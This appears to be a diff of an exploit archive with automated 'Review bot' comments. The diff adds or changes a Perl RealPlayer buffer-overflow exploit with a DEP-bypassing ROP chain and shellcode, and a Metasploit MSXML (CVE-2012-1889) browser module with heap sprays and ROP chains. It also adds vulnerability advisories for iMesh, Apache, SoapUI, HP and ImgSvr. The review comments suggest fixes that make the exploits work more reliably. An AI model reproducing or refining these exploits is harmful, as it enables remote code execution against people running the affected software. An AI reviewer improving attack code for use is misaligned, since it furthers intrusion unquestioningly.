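Review bot: The header swaps the CVE from `CVE-2013-6877` to `CVE-2013-7260` while the title still reads `RealPlayer Version Attribute Buffer Overflow`; since the next hunk removes the `$open`/`$close` XML prolog that showed which attribute received the buffer, nothing in the file now ties the payload to the stated attribute or identifier — confirm which CVE is correct and keep the title consistent with it. `Tested on: Windows XP SP2/SP3 (DEP Bypass)` would read more precisely as `(DEP enabled, bypassed via msvcrt.dll ROP chain)` now that the old `(NX)` wording is gone. Dropping the stray leading `?` before `#!/usr/bin/perl` is correct, as a BOM-like byte there breaks the shebang.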
@@ -16,14 +16,34 @@ use warnings; my $filename = "sploit.rmp"; -my $open = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"; -my $close = "\x22\x3f\x3e\x3b"; -my $junk1 = "\x41" x 2540; # Offset to SEH when opening via click -my $junk2 = "\x41" x 10514; # Offset to SEH when opening via menu -my $nSEH = "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes) -my $SEH = pack('V',0x641930c8); # POP POP RET from rpap3260.dll (16.0.3.51) -#my $SEH = pack('V',0x63A630B8); # POP POP RET from rpap3260.dll (16.0.2.32) -my $junk3 = "\x41" x 17000; # Generate exception +my $junk1 = "\x41" x 44; # Offset to ROP + Shellcode +my $junk2 = "\x43" x 1858; # Offset to SEH when opening via click (2540) +my $junk3 = "\x44" x 11052; # Offset to SEH when opening via menu (13600) +my $nSEH = "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes) +my $SEH = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll] +my $junk4 = "\x45" x 17000; # Generate exception + +my $rop_gadgets = ""; + $rop_gadgets .= pack('V',0x77c1c552); # RETN (ROP NOP) [msvcrt.dll] + $rop_gadgets .= "\x42" x 16; # JUNK + $rop_gadgets .= pack('V',0x77c21d16); # POP EAX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c11120); # &VirtualProtect() [IAT msvcrt.dll] + $rop_gadgets .= pack('V',0x77c1bb36); # POP EBP # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c20497); # skip 4 bytes [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c2362c); # POP EBX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x0000095c); # 0x0000095C-> EBX + $rop_gadgets .= pack('V',0x77c4cb29); # POP EDX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x00000040); # 0x00000040-> EDX + $rop_gadgets .= pack('V',0x77c1f519); # POP ECX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77C5D305); # &Writable location [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c23b47); # POP EDI # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c47a42); # RETN (ROP NOP) [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c2ed13); # POP ESI # RETN 
[msvcrt.dll] + $rop_gadgets .= pack('V',0x77c2aacc); # JMP [EAX] [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c12df9); # PUSHAD # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c35459); # PUSH ESP # RETN [msvcrt.dll] + +my $nops = "\x90" x 16; # msfpayload windows/exec CMD=calc.exe my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1". @@ -54,14 +74,14 @@ my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1". "\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d". "\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78". "\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c". -"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; +"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; -my $evil = $nSEH.$SEH.$shellcode; +my $evil = $rop_gadgets.$nops.$shellcode; -my $sploit = $open.$junk1.$evil.$junk2.$evil.$junk3.$close; +my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4; open(FILE, ">$filename") || die "[-]Error:\n$!\n"; -print FILE $sploit; +print FILE ""; close(FILE); print "Exploit file created successfully [$filename]!\n"; \ No newline at end of file diff --git a/platforms/windows/remote/19186.rb b/platforms/windows/remote/19186.rb index 35eefdfbe..3e4a1c0bd 100755 --- a/platforms/windows/remote/19186.rb +++ b/platforms/windows/remote/19186.rb 
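Review bot: Every gadget and the `&VirtualProtect()` IAT slot is a fixed `0x77c…` address in msvcrt.dll, which pins the chain to one specific msvcrt.dll build; the header claims `Windows XP SP2/SP3`, so either both builds were verified to share these offsets or a comment should name the exact msvcrt.dll version tested. A header comment above `$rop_gadgets` such as `# mona.py VirtualProtect chain: EAX=&VP IAT, EBX=dwSize 0x95c, EDX=PAGE_EXECUTE_READWRITE, ECX=writable scratch, ESI=JMP [EAX], EDI=RETN; PUSHAD calls VP, then PUSH ESP returns into $nops` would let a reader check the register layout without stepping it in a debugger. The `$junk2` comment `Offset to SEH when opening via click (2540)` implies 44 + length of the ROP chain + 16 + length of the shellcode + 1858 equals 2540, which cannot be checked by eye; a `die` on `length($junk1.$evil.$junk2) != 2540` would catch a stale shellcode swap. The `$SEH` gadget `ADD ESP,428 # RETN 10` from mswmdm.dll must land inside `$rop_gadgets`, so the module base this was tested against belongs in the comment too.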
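Review bot: As rendered here the new `print FILE "";` writes an empty string, so `$sploit` is assembled but never written to `sploit.rmp`; if the real line wrapped `$sploit` in an XML prolog, as the removed hex-encoded `$open`/`$close` did, that wrapper may have been eaten by the page rendering, but as shown the hunk drops the payload entirely. If the prolog is intended, the line should be `print FILE "<?xml version=\"$sploit\"?>";` — confirm against the original file. Since `$nSEH.$SEH` now appears twice in `$sploit` (the click and menu offsets), a short comment explaining the two SEH landings would also help.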
@@ -1,165 +1,387 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GoodRanking - include Msf::Exploit::Remote::HttpServer::HTML - include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :ua_name => HttpClients::IE, - :ua_minver => "6.0", - :ua_maxver => "7.0", - :javascript => true, - :os_name => OperatingSystems::WINDOWS, - :classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}", - :method => "definition", - :rank => NormalRanking - }) + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}", + :method => "definition", + :rank => GoodRanking + }) - def initialize(info={}) - super(update_info(info, - 'Name' => "Microsoft XML Core Services MSXML Uninitialized Memory Corruption", - 'Description' => %q{ - This module exploits a memory corruption flaw in Microsoft XML Core Services - when trying to access an uninitialized Node with the getDefinition API, which - may corrupt memory allowing remote code execution. At the moment, this module - only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3. 
- }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'sinn3r', # Metasploit module - 'juan vazquez' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2012-1889' ], - [ 'OSVDB', '82873'], - [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ], - [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ] - ], - 'Payload' => - { - 'BadChars' => "\x00", - 'Space' => 1024 - }, - 'DefaultOptions' => - { - 'ExitFunction' => "none", - 'InitialAutoRunScript' => 'migrate -f' - }, - 'Platform' => 'win', - 'Targets' => - [ - # msxml3.dll 8.90.1101.0 - [ 'Automatic', {} ], - [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ], - [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ] - ], - 'Privileged' => false, - 'DisclosureDate' => "Jun 12 2012", - 'DefaultTarget' => 0)) + def initialize(info={}) + super(update_info(info, + 'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", + 'Description' => %q{ + This module exploits a memory corruption flaw in Microsoft XML Core Services + when trying to access an uninitialized Node with the getDefinition API, which + may corrupt memory allowing remote code execution. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'inking26', # Reliable exploitation + 'binjo', # Metasploit module + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-1889' ], + [ 'BID', '53934' ], + [ 'OSVDB', '82873'], + [ 'MSB', 'MS12-043'], + [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ], + [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ], + [ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ], + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 1024 + }, + 'DefaultOptions' => + { + 'ExitFunction' => "process", + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # msxml3.dll 8.90.1101.0 + [ 'Automatic', {} ], + [ + 'IE 6 on Windows XP SP3', + { + 'Offset' => '0x100', + 'Rop' => nil, + 'RandomHeap' => false + } + ], + [ + 'IE 7 on Windows XP SP3 / Vista SP2', + { + 'Offset' => '0x100', + 'Rop' => nil, + 'RandomHeap' => false + } + ], + [ + 'IE 8 on Windows XP SP3', + { + 'Rop' => :msvcrt, + 'RandomHeap' => false, + 'RopChainOffset' => '0x5f4', + 'Offset' => '0x0', + 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll + } + ], + [ + 'IE 8 with Java 6 on Windows XP SP3', + { + 'Rop' => :jre, + 'RandomHeap' => false, + 'RopChainOffset' => '0x5f4', + 'Offset' => '0x0', + 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll + } + ], + [ + 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2', + { + 'Rop' => :jre, + 'RandomHeap' => false, + 'RopChainOffset' => '0x5f4', + 'Offset' => '0x0', + 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll + } + ], + [ + 'IE 9 with Java 6 on Windows 7 SP1', + { + 'Rop' => :jre, + 'RandomHeap' => true, + 'RopChainOffset' 
=> 0x5FC, + 'Offset' => '0x0', + 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 12 2012", + 'DefaultTarget' => 0)) - register_options( - [ - OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) - ], self.class) - end + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + end - def get_target(agent) - #If the user is already specified by the user, we'll just use that - return target if target.name != 'Automatic' + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' - if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ - return targets[1] #IE 6 on Windows XP SP3 - elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ - return targets[2] #IE 7 on Windows XP SP3 - else - return nil - end - end + if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ + return targets[1] #IE 6 on Windows XP SP3 + elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ + return targets[2] #IE 7 on Windows XP SP3 + elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ + return targets[2] #IE 7 on Windows Vista SP2 + elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ + return targets[3] #IE 8 on Windows XP SP3 + elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/ + return targets[5] #IE 8 on Windows 7 SP1/Vista SP2 + elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ + return targets[6] #IE 9 on Windows 7 SP1 + else + return nil + end + end - def on_request_uri(cli, request) - agent = request.headers['User-Agent'] - my_target = get_target(agent) + def ret(t) + case t['Rop'] + when :msvcrt + return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll + when :jre + return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll + end + end - # Avoid the attack if the victim doesn't have the same setup we're targeting - if my_target.nil? 
- print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") - send_not_found(cli) - return - end + def popret(t) + case t['Rop'] + when :msvcrt + return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll + when :jre + return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll + end + end - # Set payload depending on target - p = payload.encoded + def get_rop_chain(t) + if t['RandomHeap'] + adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c + adjust << ret(t) + else + adjust = ret(t) + end - js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) - js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + adjust << popret(t) + adjust << [ t['StackPivot'] ].pack("V") + adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :) - js = <<-JS - var heap_obj = new heapLib.ie(0x20000); - var code = unescape("#{js_code}"); - var nops = unescape("#{js_nops}"); + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust}) - while (nops.length < 0x80000) nops += nops; - var offset = nops.substring(0, #{my_target['Offset']}); - var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + else + print_status("Using JRE ROP") + rop = generate_rop_payload('java','',{'pivot'=>adjust}) + end - while (shellcode.length < 0x40000) shellcode += shellcode; - var block = shellcode.substring(0, (0x80000-6)/2); + return rop + end - heap_obj.gc(); + def get_easy_spray(t, js_code, js_nops) - for (var i=1; i < 0xa70; i++) { - heap_obj.alloc(block); - } + spray = <<-JS + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); - JS + while (nops.length < 0x80000) nops += nops; - js = heaplib(js, {:noobfu => true}) + var offset = 
nops.substring(0, #{t['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); - if datastore['OBFUSCATE'] - js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate - end + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); - object_id = rand_text_alpha(4) - html = <<-EOS - - - - - - - - - EOS + heap_obj.gc(); + for (var z=1; z < 0x230; z++) { + heap_obj.alloc(block); + } - html = html.gsub(/^\t/, '') + JS - print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") - send_response(cli, html, {'Content-Type'=>'text/html'}) + return spray - end + end + + + def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops) + + spray = <<-JS + + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + var nops_90 = unescape("#{js_90_nops}"); + var rop_chain = unescape("#{js_rop}"); + + while (nops.length < 0x80000) nops += nops; + while (nops_90.length < 0x80000) nops_90 += nops_90; + + var offset = nops.substring(0, #{t['Offset']}); + var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length); + var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length); + + + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + + + heap_obj.gc(); + for (var z=1; z < 0x230; z++) { + heap_obj.alloc(block); + } + + JS + + return spray + + end + + # Spray published by corelanc0d3r + # Exploit writing tutorial part 11 : Heap Spraying Demystified + # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ + def get_random_spray(t, js_rop, js_code, js_90_nops) + + spray = <<-JS + + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += 
Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + + var rop = unescape("#{js_rop}"); + var code = unescape("#{js_code}"); + var nops_90 = unescape("#{js_90_nops}"); + + while (nops_90.length < 0x80000) nops_90 += nops_90; + + var offset_length = #{t['RopChainOffset']}; + + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length - code.length); + var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + + JS + + return spray + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + my_target = get_target(agent) + + # Avoid the attack if the victim doesn't have the same setup we're targeting + if my_target.nil? + print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") + send_not_found(cli) + return + end + + p = payload.encoded + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) + js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + + if not my_target['Rop'].nil? + js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch)) + end + + if my_target['RandomHeap'] + js = get_random_spray(my_target, js_rop, js_code, js_90_nops) + elsif not my_target['Rop'].nil? 
+ js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops) + else + js = get_easy_spray(my_target, js_code, js_nops) + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + object_id = rand_text_alpha(4) + + html = <<-EOS + + + + + + + + + + EOS + + html = html.gsub(/^ {4}/, '') + + print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") + send_response(cli, html, {'Content-Type'=>'text/html'}) + + end end =begin - -* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0 - (e34.358): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. diff --git a/platforms/windows/remote/30897.html b/platforms/windows/remote/30897.html new file mode 100755 index 000000000..fbbf7d229 --- /dev/null +++ b/platforms/windows/remote/30897.html @@ -0,0 +1,45 @@ +source: http://www.securityfocus.com/bid/26916/info + + +iMesh is prone to a code-execution vulnerability because the application fails to sanitize user-supplied data, which can lead to memory corruption. + +Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. + +iMesh 7.1.0.37263 and prior versions are reported affected by this issue. + + + + + + diff --git a/platforms/windows/remote/30901.txt b/platforms/windows/remote/30901.txt new file mode 100755 index 000000000..6d30c8915 --- /dev/null +++ b/platforms/windows/remote/30901.txt 
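Review bot: The IE 9 target's `'RopChainOffset' => 0x5FC` is an Integer while every other target gives the same key as a string (`'0x5f4'`), so the `#{t['RopChainOffset']}` interpolation in `get_random_spray` emits a decimal `1532` for one target and a hex literal for the rest; `'RopChainOffset' => '0x5fc',` keeps the generated JavaScript uniform across targets. In `ret` and `popret` the `case t['Rop']` has no `else`, so an unrecognised `Rop` value returns nil and only surfaces later as a TypeError from `adjust << popret(t)` in `get_rop_chain`; an `else raise ArgumentError, "Unsupported Rop: #{t['Rop'].inspect}"` in both methods fails at the source with a readable message. The `get_target` comments `#IE 8 on Windows 7 SP1/Vista SP2` and `#IE 9 on Windows 7 SP1` for `targets[5]` and `targets[6]` omit that those are the 'with Java 6' entries, so the user-agent match silently assumes the JRE is installed; the comments should name the target they actually select.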
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/26939/info
+
+Apache is prone to an information-disclosure vulnerability.
+
+This issue occurs because Apache fails to properly associate file extensions with the correct engines when handling specially crafted requests for files on Windows SMB shares.
+
+Attackers can leverage this issue to view arbitrary script files as plain text. Potentially sensitive information may be present in the script code. Information harvested could aid in further attacks.
+
+This issue affects Apache 2.2.6 when serving PHP files from a Windows SMB share; other versions may also be affected.
+
+NOTE: This issue may also occur when handling other filename extensions that use AddType directives to associate scripts or executables (e.g. '.cgi\', '.py\', '.rb\', etc.).
+
+http://www.example.com/winshare/info.php\
\ No newline at end of file
diff --git a/platforms/windows/remote/30908.txt b/platforms/windows/remote/30908.txt
new file mode 100755
index 000000000..299fba910
--- /dev/null
+++ b/platforms/windows/remote/30908.txt
@@ -0,0 +1,125 @@
+# Exploit Title: SoapUI Remote Code Execution
+# Date: 25.12.13
+# Exploit Author: Barak Tawily
+# Vendor Homepage: http://www.soapui.org/
+# Software Link:
+
+http://www.soapui.org/Downloads/download-soapui-pro-trial.html
+# Version: vulnerable before 4.6.4
+# Tested on: Windows, should work at Linux as well
+# CVE : CVE-2014-1202
+
+
+
+Hey guys.
+
+My name is Barak Tawily, I work for Appsec-Labs as information security
+researcher.
+
+I have been found remote code execution vulnerability in the SoapUI product,
+which allows me to execute a java code to the victim's computer via
+malicious WSDL/WADL file.
+
+This vulnerability allows attacker to execute java code to any client's
+machine that will use my WSDL file and will try to send request to the
+remote server.
+
+SoapUI allows the client execute code by entering a java code inside the
+following tag, the java code will be executed when the client will try to
+send request to the server:
+
+${=JAVA CODE};
+
+Thus, an attacker can make a malicious WSDL file, determine a malicious java
+code as default value in one of the requests parameters, hence, when client
+uses malicious WSDL file and will try to send a request the java code will
+be executed.
+
+The attack flow is:
+
+1. The attacker makes a malicious web service with fake WSDL including
+the java payload that will be executed on the victim.
+
+2. The victim enters the soapUI program and will enter the malicious
+WSDL address.
+
+3. The victim decides to send a request to the server, and the java
+code executed on the victim's machine.
+
+4. The attacker succeed execute java code in the victim's machine, and
+will take over it.
+
+This vulnerability was check on the version (4.6.3), a proof of concept
+video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0
+
+malicious WSDL is attached.
+
+Please let me know if the vulnerability is about to publish
+
+Thanks, Barak.
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + My first service + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/30920.html b/platforms/windows/remote/30920.html new file mode 100755 index 000000000..d5e278705 --- /dev/null +++ b/platforms/windows/remote/30920.html @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/26967/info + +The HP eSupportDiagnostics ActiveX control is prone to multiple information-disclosure vulnerabilities. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page. + +Successfully exploiting these issues allows remote attackers to obtain the contents of arbitrary files and registry values. Information harvested may aid in further attacks. + +These issues affect 'hpediag.dll' 1.0.11.0; other versions may also be affected. + + + + + + + + + + + diff --git a/platforms/windows/remote/30939.txt b/platforms/windows/remote/30939.txt new file mode 100755 index 000000000..28423cba9 --- /dev/null +++ b/platforms/windows/remote/30939.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27033/info + +ImgSvr is prone to a remote script-execution vulnerability because it fails to adequately sanitize user-supplied input. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +This issue affects ImgSvr 0.6.21; other versions may also be vulnerable. + +http://www.example.com/../[code] \ No newline at end of file